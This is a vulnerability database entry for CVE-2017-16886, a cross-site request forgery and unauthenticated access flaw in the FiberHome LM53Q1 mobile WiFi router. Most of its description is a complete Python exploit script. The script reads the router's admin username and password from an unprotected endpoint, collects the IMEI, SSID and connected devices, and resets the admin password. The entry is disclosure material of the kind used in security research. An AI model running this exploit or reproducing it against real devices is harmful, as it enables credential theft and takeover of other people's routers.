ID

VAR-201801-0581

CVE

CVE-2017-16886

TITLE

FiberHome mobile WIFI Device model LM53Q1 Vulnerable to cross-site request forgery

DESCRIPTION

The portal on FiberHome Mobile WIFI Device Model LM53Q1 VH519R05C01S38 uses SOAP based web services in order to interact with the portal. Unauthorized Access to Web Services via CSRF can result in an unauthorized change of username or password of the administrator of the portal. FiberHome mobile WIFI Device model LM53Q1 Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. FiberHomeMobileWIFIDeviceLM53Q1 is a portable router device from China FiberHome. A vulnerability exists in the portal in the FiberHomeMobileWIFIDeviceLM53Q1VH519R05C01S38 release. #!/usr/bin/python # /$$$$$$$$ /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$$$$$$$ /$$ /$$ /$$ # | $$_____/|__/| $$ | $$ | $$ | $$__ $$ | $$ | $$_____/ | $$ |__/ | $$ # | $$ /$$| $$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ | $$ \ $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ /$$ /$$ /$$$$$$ | $$ /$$$$$$ /$$ /$$$$$$ # | $$$$$ | $$| $$__ $$ /$$__ $$ /$$__ $$| $$$$$$$$ /$$__ $$| $$_ $$_ $$ /$$__ $$ | $$$$$$$/ /$$__ $$| $$_ $$_ $$ /$$__ $$|_ $$_/ /$$__ $$ | $$$$$ | $$ /$$/ /$$__ $$| $$ /$$__ $$| $$|_ $$_/ # | $$__/ | $$| $$ \ $$| $$$$$$$$| $$ \__/| $$__ $$| $$ \ $$| $$ \ $$ \ $$| $$$$$$$$ | $$__ $$| $$$$$$$$| $$ \ $$ \ $$| $$ \ $$ | $$ | $$$$$$$$ | $$__/ \ $$$$/ | $$ \ $$| $$| $$ \ $$| $$ | $$ # | $$ | $$| $$ | $$| $$_____/| $$ | $$ | $$| $$ | $$| $$ | $$ | $$| $$_____/ | $$ \ $$| $$_____/| $$ | $$ | $$| $$ | $$ | $$ /$$| $$_____/ | $$ >$$ $$ | $$ | $$| $$| $$ | $$| $$ | $$ /$$ # | $$ | $$| $$$$$$$/| $$$$$$$| $$ | $$ | $$| $$$$$$/| $$ | $$ | $$| $$$$$$$ | $$ | $$| $$$$$$$| $$ | $$ | $$| $$$$$$/ | $$$$/| $$$$$$$ | $$$$$$$$ /$$/\ $$| $$$$$$$/| $$| $$$$$$/| $$ | $$$$/ # |__/ |__/|_______/ \_______/|__/ |__/ |__/ \______/ |__/ |__/ |__/ \_______/ |__/ |__/ \_______/|__/ |__/ |__/ \______/ \___/ \_______/ |________/|__/ \__/| $$____/ |__/ \______/ |__/ \___/ # | $$ # | $$ # |__/ # Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities # Exploit Author: Ibad Shah # Vendor Homepage: www.fiberhome.com # Version: VH519R05C01S38 # Tested on: Linux # Platform : Hardware # CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887 # Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC import requests,sys,getopt,socket,struct #Declaring IP as our global variable to probe for Gateway IP of Device global ip #Getting Gateway IP Address def get_default_gateway_linux(): with open("/proc/net/route") as fh: for line in fh: fields = line.strip().split() if fields[1] != '00000000' or not int(fields[3], 16) & 2: continue return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16))) return; ip = get_default_gateway_linux() exploit_title = "=============================================== \n FiberHome Remote Administrator Account Details \n================================================"; #Function to get Device Statistics def get_device_details(): gateway = None hardware = None device_name = None devices_all = '' version = None gateway = None ssid = '' dns1 = None dns2 = None requestStatus = requests.get("http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=status1") api_response = requestStatus.content.replace('\t','').split('\n') for results in api_response: if "<hardware_version>" in results: hardware = results.replace('<hardware_version>','').replace('</hardware_version>','').replace(' ','').replace('\n','') if "<device_name>" in results: device_name = results.replace('<device_name>','').replace('</device_name>','').replace(' ','').replace('\n','') if "<version_num>" in results: version = results.replace('<version_num>','').replace('</version_num>','').replace(' ','').replace('\n','') if "<gateway>" in results: gateway = results.replace('<gateway>','').replace('</gateway>','').replace(' ','').replace('\n','') if "<ssid>" in results: ssid = results.replace('<ssid>','').replace('</ssid>','').replace('\n','') if "<dns1>" in results: dns1 = results.replace('<dns1>','').replace('</dns1>','').replace(' ','').replace('\n','') if "<dns2>" in results: dns2 = results.replace('<dns2>','').replace('</dns2>','').replace(' ','').replace('\n','') if "<IMEI>" in results: imei = results.replace('<IMEI>','').replace('</IMEI>','').replace(' ','').replace('\n','') print "\n==============================================" print "\nHardware Version of Device : "+hardware+"\n" print "\nName of Device : "+device_name+"\n" print "\nSoftware Version of Device : "+version+"\n" print "\nIMEI of Device! : "+imei+"\n" print "\nWiFi SSID of Device : "+ssid+"\n" print "\nGateway of Zong Device : "+gateway+"\n" print "\nDNS Primary of Device : "+dns1+"\n" print "\nDNS Secondary of Device : "+dns2+"\n" print "\n=============================================================================\n"; if "<known_devices_list>" in results: devices_all = results.replace('<known_devices_list>','').replace('</known_devices_list>','').replace('\n','') print "\nConnected Devices to WIFI\n" print devices_all #Function for getting User Account Details to login to Portal def get_user_account_details(): request = requests.get("http://"+ip+"/xml_action.cgi?method=get&module=duster&file=admin") admin_details = request.content.replace('\t','').split('\n') for admin_login_response in admin_details: if "<router_username>" in admin_login_response: username = admin_login_response.replace('<router_username>','').replace('</router_username>','') if "<router_password>" in admin_login_response: password = admin_login_response.replace('<router_password>','').replace('</router_password>','') print "\nUsername of Device Web Application :\n"+username+" " print "Password of Device Web Application :\n"+password+"\n" print "\n=============================================================================\n"; #Function to change Administrator Password def change_admin_password(): set_password = raw_input("\nEnter Password to Change : ") password = str(set_password) xml = "<?xml version='1.0' encoding='UTF-8'?><RGW><management><router_password>"+password+"</router_password></management></RGW>" headers = {'Content-Type': 'application/xml'} change_password_request = requests.post("http://"+ip+"/xml_action.cgi?method=set&module=duster&file=admin", data=xml, headers=headers).text print "Password Changed!" def main(): print exploit_title print "\nSelect Menu For Fetching Details \n \n 1. Get Portal Login & Password. \n 2. Get Other Details. \n 3. Change Admin Password for Device" get_option = raw_input("\n Enter Option : "); option = int(get_option) if get_option == "1": get_user_account_details() raw_input("\n Press Any Key To Exit"); elif get_option == "2": get_device_details() raw_input("\n Press Any Key To Exit"); elif get_option == "3": change_admin_password() elif get_option == "": print "Good Bye!"; else: print "Goodbye!"; main()

IOT TAXONOMY

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

cross-site request forgery

CONFIGURATIONS

EXPLOIT AVAILABILITY

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

Ibad Shah

SOURCES

LAST UPDATE DATE

2024-11-23T19:38:45.056000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE